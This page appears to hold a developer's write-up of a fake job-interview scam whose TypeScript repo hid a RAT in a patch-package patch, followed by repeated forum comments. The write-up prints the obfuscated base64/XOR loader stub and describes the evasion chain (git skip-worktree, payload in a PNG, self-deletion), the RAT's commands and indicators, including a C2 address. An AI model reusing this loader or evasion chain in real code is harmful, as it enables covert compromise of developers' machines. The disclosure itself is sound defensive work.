Anatomy of a Failed (Nation-State?) Attack

This all stinks of Lazarus:

https://en.wikipedia.org/wiki/Lazarus_Group

I've done incident responses for this exact type of attack multiple times. They've gotten much better organized lately and will often contact developers directly (over LinkedIn or WhatsApp) to run this type of attack. (Although, usually pretending to run a test for a job interview -- which is maybe why the author was confused about the code)

Author here - if anyone has any contacts at Cloudflare to get the proxied domains (at least roadpay[.]cc) taken down, that would be great. I wasn't able to get an abuse report to stick. Ditto for the related LinkedIn profile and Twitter accounts.

The C2 IP (89.124.107.161) and malware-serving git repo (144.124.244.92) are both hosted on VDSINA in Russia, so not sure if there's anything to do there.

I snagged right away at "the kind of low-level reliability judgment that most teams only notice when something breaks." Real people don't talk like the J. Peterman catalog.

I run training courses on developer security to broaden their understanding of threat surface from their behaviour, day-to-day tooling, the repositories they work on and broader supply chain. One of the modules covers this exact scenario, it's amazing how many people do these exercises on corporate machines let alone their personal device!

There are mitigations you can put in place by using containers, virtual machines or even the execution environment e.g. Deno's ability to block/whitelist network calls[0], Bun's --ignore-scripts [1] and supply chain package managers have made some strides here like pnpm [2]. But it's knowing your threat surface and how to use your tooling which can be quite overbearing on cognitive load, especially in fast paced scenarios like "job of a lifetime offer!" from linked in.

Easiest way by default is to use ephemeral VMs / Sandbox Containers for such tasks which don't have mounted directories to your system etc. Or spin up a cheap EC2 / VPS to work on them in a short period of time.

[0] - https://deno.com/blog/deno-protects-npm-exploits and https://docs.deno.com/runtime/fundamentals/security/

[1] - https://bun.com/docs/pm/lifecycle

[2] - https://pnpm.io/supply-chain-security

[2] - https://

This type of attack is going on for few years now. I had 2 in my credit.

Some details https://freebird.in/malicious-code-source-code-shared-via-jo...

I had an email like that last week, where sender claimed to be from Singapore, but the company and the person were not searchable on the blue site and their interview scheduling link didn't match Singapore timezone, while the domain was registered through an Indian registrar. The email didn't sound right somehow.

I almost scheduled a call with them and even self-explained that of course they would be on Pacific time, it's where the money is.

I do have some npm packages under my name and they found me through github, so here is that.

Crime surged during COVID. But, what type of crime?

https://www.tandfonline.com/doi/full/10.1080/2330443X.2022.2...

Hint: homicides and car theft. Burglary and larceny actually went down.

But, homicides surged prior to the start of the pandemic. If there is no correlation between the economic shutdown and homicides, then the crime surge was basically just car theft.

Car theft does not come from random homeless people. You don't steal a catalytic converter unless you know where you can sell it. You don't steal a car to make money, and then look around on where you can sell it. And, car theft, unless it is a car jacking, is free of violence. During COVID I think a lot of "noveau criminals" came out of the woodwork, people that were probably barely surviving with legitimate jobs that disappeared during the shutdown. I saw an article where police jailed someone that was just a father and son, caught stealing multiple cars. Those men had no prior record and that seemed very strange to me.

I'm saying all this because this attack could be by Lazarus, as another commenter pointed out. Or, could it be someone using an LLM to create a similar attack by prompting "Make me a post-install attack that looks like something the Lazarus group would do." Could LLM create a new class of local criminals? It is trivial now to setup a website that looks like a legitimate AI business (because AI businesses all have to sound ridiculous to be taken seriously). Creating the assets to make this attack work can be done with a $20/mo Claude account and a local LLM for the dirty bits. It would leave a trail for sure, but I imagine someone that has worked on tracing those trails could come up with an imaginative way to hide just the right things.

I've experienced the "best economy in the history of the US" for the last several years. To me, it looks like we have been in a recession for years, that was before the AI boom. When a massive group of people face drastic and sudden unemployment, which is what it looks like to an aging tech worker like me, I bet at least some of them would consider this. The tech sector has lost more jobs in the last 6 months than in 2025. And, that group has zero North Korean nationals. It might be someone living in a suburb in Phoenix, Arizona that can't pay their mortgage anymore.

Who knows if this attack was seasoned professionals. But, when we talk about AI creating or destroying jobs, couldn't AI create a bunch of "jobs" which are stealing banking credentials on behalf of 55 year olds, no longer able to find jobs in the tech industry?

If nothing else, this feels like it would make a good contemporary sci-fi story.

Wow, this is pretty scary. LLMs have made phishing attempts look so much more legit, and the damage they can do so much greater.

wow, this is actually a really impressive attack - a far cry from the obfuscated postinstall hooks seen a million times before.

the only real long-term solution to node-based attacks like this is to run any remote code in a container, or even a VM?

[0] - https://deno.com/blog/deno-protects-npm-exploits and https://docs.deno.com/runtime/fundamentals/security/

[1] - https://bun.com/docs/pm/lifecycle

[2] - https://pnpm.io/supply-chain-security

[2] - https://

This type of attack is going on for few years now. I had 2 in my credit.

Some details https://freebird.in/malicious-code-source-code-shared-via-jo...

I almost scheduled a call with them and even self-explained that of course they would be on Pacific time, it's where the money is.

I do have some npm packages under my name and they found me through github, so here is that.

wow, this is actually a really impressive attack - a far cry from the obfuscated postinstall hooks seen a million times before.

the only real long-term solution to node-based attacks like this is to run any remote code in a container, or even a VM?

This all stinks of Lazarus:

https://en.wikipedia.org/wiki/Lazarus_Group

Why assume it is Lazarus?

This sort of an attack is comically simple to pull off with a 12b obliterated LLM model and some basic scripts and proxies.

Security has to evolve, or the world will be cooked by script kiddies running email loops.

There's really nothing sophisticated about this these days, and it's only a short matter of time before it becomes commonplace.

100%. I can't find it now, but someone last month posted a similar story on HN. The threat actor had stolen someone's GitHub account and altered their otherwise legitimate looking repo. They'll expend a lot of effort in order to masquerade and trick you. TraderTraitor is another good DPRK example.

Anyone reading - if you're ever a victim, worth reporting to your national CERT and your org. The CERT can provide advice, it's useful for their threat intel, and your org can check their systems. You might not be the end target.

The C2 IP (89.124.107.161) and malware-serving git repo (144.124.244.92) are both hosted on VDSINA in Russia, so not sure if there's anything to do there.

If you're hosting malware today of course you want to host in Russia. Those are the only hosts that won't kick you off the internet or get kicked off the internet themselves for hosting malware. Check what happened to Tony Stark Solutions (or what was it called). Since they didn't police their customers harshly enough, the owners are in prison for aiding and abetting varied cyber-crimes.

Business establishments don't like to ban troublemakers. Bad for business. (Unless it gets enough bad press, then it becomes good for business).

I snagged right away at "the kind of low-level reliability judgment that most teams only notice when something breaks." Real people don't talk like the J. Peterman catalog.

For sure, but I also expect real people who do cold-reaches like this to be using LLMs. I wouldn't have assumed it was indicative of malicious intent, just laziness.

Crime surged during COVID. But, what type of crime?

https://www.tandfonline.com/doi/full/10.1080/2330443X.2022.2...

Hint: homicides and car theft. Burglary and larceny actually went down.

But, homicides surged prior to the start of the pandemic. If there is no correlation between the economic shutdown and homicides, then the crime surge was basically just car theft.

If nothing else, this feels like it would make a good contemporary sci-fi story.

We aren't in a recession while the stock market is up, even though that has nothing do with the state of the economy

You definitely make a good point there. The job market is becoming impossible to navigate, and people will become desperate. Bills need to be paid and families need to be fed, if someone loses a job in tech, they could be easily tempted to 'hacking' others nowadays. Its becoming trivially easy to do so thanks the things you mentioned, and if you target others in other countries not allied with the US you could even possibly get away with never getting punished even if caught.

Wow, this is pretty scary. LLMs have made phishing attempts look so much more legit, and the damage they can do so much greater.

Why assume it is Lazarus?

This sort of an attack is comically simple to pull off with a 12b obliterated LLM model and some basic scripts and proxies.

Security has to evolve, or the world will be cooked by script kiddies running email loops.

There's really nothing sophisticated about this these days, and it's only a short matter of time before it becomes commonplace.

Business establishments don't like to ban troublemakers. Bad for business. (Unless it gets enough bad press, then it becomes good for business).

For sure, but I also expect real people who do cold-reaches like this to be using LLMs. I wouldn't have assumed it was indicative of malicious intent, just laziness.

We aren't in a recession while the stock market is up, even though that has nothing do with the state of the economy

No disagreement there, good point.

Disclosures

ðŸ§ This post is fully human-written: all prose with the exception of the IoC information. Because it was time-sensitive, Claude was used to accelerate the RAT analysis and build an IoC-detection script.

As I live in Canada, this information was reported to the appropriate Canadian agencies (CCCS et al). The payload-laden image does not trigger any AV engines on VirusTotal.

The attackerâ€™s identity is fictitious, but there are uninvolved individuals with the same name that they may be confused for and have been omitted from this piece.

On Reddit thereâ€™s a few others in the Rust community who mentioned they were targeted as well.

This week I came in far-to-close contact with a fake-interview scam designed to backdoor my machine, and from the context of the emails, I assume my packages on crates.io.

Note: Iâ€™m calling it the â€œPinpinRATâ€ because of some of the internal strings, but itâ€™s possible this has another name out there. I couldnâ€™t find any other references to it online.

A week and a half ago I received an email from â€œDâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ Sâ–ˆâ–ˆâ–ˆâ–ˆâ€ claiming to be from Lua Ventures, a (unbeknownst to me at the time) defunct Singapore-based VC in the DeFi space. To be clear: this is a fabricated persona, and the name was likely chosen to be easily mistaken for one of a number of real people with the name.

It looked like a real email, including a link to a somewhat boring, but legitimate-looking LinkedIn profile.

The attacker even name-dropped two of their investments that were specifically looking for advisory work: Lyrasing and Roadpay. Searching for either of the companies wasnâ€™t really a flag - they both had some very basic web presense, but nothing that would indicate they were fake rather than just early stage. (archive.org snapshot of roadpay.cc).

We went back and forth on a meeting time and eventually settled on a time we were going to chat. There was nothing odd about the call itself, either. A somewhat-difficult-to-understand man with a German accent was on the other line. He said he was taking the call while travelling which was a bit odd, but again, not necessarily a flag.

After the call came the bait. A follow-up email that offered up a â€œtestâ€.

At this point I was mildly annoyed, but not suspicious. I cloned the repo, but the first true red flag only fired here.

Where I got lucky: they sent me a TypeScript repo. It didnâ€™t make sense to me. The instructions looked more like a TypeScript job interview than any sort of architecture analysis. I decided to zip up the repo and toss it into the Claude to get a quick scan - a combination of caution and laziness.

A few moments later it had identified some oddities:

Notably, the root package.json has no postinstall/preinstall hook â€” interesting, because they use patch-package, which is normally wired to a postinstall. Let me check every package.json for lifecycle scripts, then audit the patch files (the real risk surface â€” patches can inject arbitrary code into node_modules).

That piqued my interest. I scanned the directories myself and noticed a fairly unreasonable number of patches/ directories. The first few I checked seemed innocent enough, but as you might have guessed, they were just trying to add noise so the real payload wouldnâ€™t get caught.

packages/electron-benchmarks/patches/sumchecker+3.0.1.patch
packages/electron-benchmarks/patches/@electron+get+2.0.3.patch
packages/electron-benchmarks/patches/extract-zip+2.0.1.patch

While I was checking slowly by hand, Claude identified first signs of PinpinRAT:

I found it. This is a malicious payload. Embedded in the typescript+5.9.2.patch file â€” inside what is presented as a routine â€œmodule specifierâ€ patch to TypeScript â€” there is a base64-blob self-executing obfuscation stub injected at the very top of both _tsc.js and typescript.js:

;;(function(r,k){const d=Buffer.from(r,'base64');for(let i=0;i<d.length;i+=1)d[i]^=k;return new Function('require','Buffer','WebAssembly','process','__dirname',d.toString('utf8'))(require,Buffer,WebAssembly,process,__dirname)})("YWFg...",73)/*12ff4b51*/
void "ticket-harbor-tsc-shim-anchor";

This decodes a base64 string, XOR-decrypts every byte with the key 73, and runs the result through new Function(â€¦) with require, process, Buffer, etc. handed in. That is a hidden code-execution payload that fires every time tsc or anything importing typescript.js runs â€” i.e. on the very first npm run typecheck / build / dev.

â€¦ and thatâ€™s the point where I decided to stop poking the bear on my own machine. I zipped it up with a password to stop myself from accidentally detonating it and kept running the analysis in the sandbox.

The Trap

The repo is themed as a ferry-ticketing app named â€œTicket Harborâ€. The task.txt included in the bundle was a plausible set of boring tasks, but ended with:

Run the repo typecheck, test suite, and relevant desktop/server build commands before submitting.

That instruction is the trap that gets you.

The chain works like this:

Four separate postinstall hooks run patch-package. But one of them also runs git update-index --skip-worktree on the patch files, which hides them from git status.
The typescript+5.9.2.patch injects a self-executing stub at the top of typescript.js and _tsc.js. This is a lightly-obfuscated blob fed into new Function(...) (avoiding eval, presumably to avoid malware detection).
That loader reads a hidden chunk appended to a file named operators/3.png, runs a small embedded WASM stub (in a custom wAsm chunk), then spawns a detached, silent Node process carrying a 1.68 MB obfuscated second-stage payload.
It cleans up after itself at three layers: the git skip-worktree trick, the dropper rewrites the patch to delete its own injected lines after first run, and the stage-2 temp directory self-deletes on execution.

The actual payload is a RAT (a remote-access trojan). I was originally worried this was a credential stealer but thatâ€™s a lot worse. PinpinRAT is nested in three obfuscated layers which were a pain to unwrap: obfuscator.io (which claims LLM protection, hah), and two further base64 layers.

What it drops

In the interest of 1) quickly sharing this info and 2) not accidentally detonating malware on my own machines, I let Claude tear apart the actual trojan in its sandbox and had it describe it to me.

To be absolutely clear: Claude was able to reverse engineer multiple levels of obfuscation over about 5 minutes of work, which is far faster than I could have.

The drop is a full remote-access trojan that seems to have been put together by someone who knows what they are doing. It sets up an RSA key locally and uses AES-256-CBC as a session key.

On startup it calls a checkin routine that harvests and exfiltrates a host fingerprint:

primary IP address (enumerates all non-internal interfaces), plus all IPs
username (os.userInfo().username)
hostname
OS type + release + platform + architecture
process PID and full process.argv
Node version

It generates an RSA-2048 keypair and a random AES-256 session key (aes_psk), then all subsequent traffic is AES-256-CBC encrypted with an HMAC-SHA256 integrity tag.

It supports the following commands:

env â€” JSON.stringify(process.env) dumped and sent back.
upload â€” reads an arbitrary file path and exfiltrates it.
download â€” writes attacker-supplied bytes to any writable path.
spawn â€” runs an arbitrary process with optional shell expansion.
ls / cd / pwd / cp / mv â€” general filesystem primitives.
dns â€” makes the host resolve arbitrary names through a specified resolver (for DNS tunneling?).
dismantle â€” self-removal.

Indicators of Compromise

If you ended up running one of these, you should immediately disconnect your system from the network and rotate your credentials from another machine. Remediation should be straightforward, but consider your credentials (including cookies and password-protected secrets) compromised.

These are some indicators of compromise found in the PinpinRAT malware:

C2: 89.124.107.161:80
Scheduled task (Windows): PinpinWrappedJs
Process masquerade (macOS): com.apple.WebKit.Networking
Env vars: NODT_PAYLOAD_PATH, NODT_PAYLOAD_ARGS
PNG chunk guard: WASMPACK (wAsm)
PINPIN_NO_AUTOSTART=1: stops persistence
cronjob with mutex.js (only if the RAT had permission, may not exist on macOS)
Anchor strings in typescript.js: 12ff4b51, ticket-harbor-tsc-shim-anchor
typescript+5.9.2.patch with the payload
Artifact dirs: ~/Library/Caches/runtime-cache/.cache-<randomhex>/ (macOS), /tmp/.cache-<randomhex>/ (Linux), %TEMP%\.cache-<randomhex>\ (Windows)
- .. containing payload.js and mutex.js

Where I should have seen flags

Thereâ€™s a few places I should have seen flags earlier on. The goal of the campaign is to keep the flags subtle enough they donâ€™t trigger your defences, but you need to be vigilent enough to see when enough yellow flags stack up to a red one.

The messages have some LLM tells to them when you look closer. Thatâ€™s probably a sign that you should approach anything with extreme skepticism.

The LinkedIn profile looks real at first glance, but itâ€™s filled with gibberish (â€œBSc(Hons), MA (Dist), PGDipFM, CEngâ€?) that should at least trigger sort of salad vibes. No real activity.

The social media link on their website has a real history, but the name was changed in November 2025. The posts are all pretty vacuous, vague praise for companies that arenâ€™t really described in any detail.

None of the companies that had websites had a real presence beyond their flashy websites.

They never sent a proper invite - it was just a time and a Google Meet. What VC doesnâ€™t use a calendar? Their camera was off the whole time and they were â€œtravellingâ€.

And the overall approach, a VC fund based in Singapore, operating out of CEST, reaching out to a developer in Canada, with domains targeting American customers but ending in .cc. Itâ€™s far more difficult to check credentials of an organization thatâ€™s so far away.

Nothing was obvious without hindsight, but the missing pieces are there if you look at the whole thing together.

So who was this?

Itâ€™s impossible to say for sure, but this was targeted, had a pretty convincing cover story with a fake persona, multiple fake websites with stolen history, and a patient timeline. The git trap was sophisticated. This â€œfake-interview scamâ€ has been a theme for a number of actors in 2026.

Who is actually behind this is the responsibility of the agencies now. What is worth noting is that this was targeted to developers like you and I, and that I was lucky enough to see a red flag right before springing the trap.

And to be honest, whatâ€™s terrifying and sobering to me is that if this had been a Rust repository with a booby-trapped build.rs script, I might have even fallen for it.

Hacker Times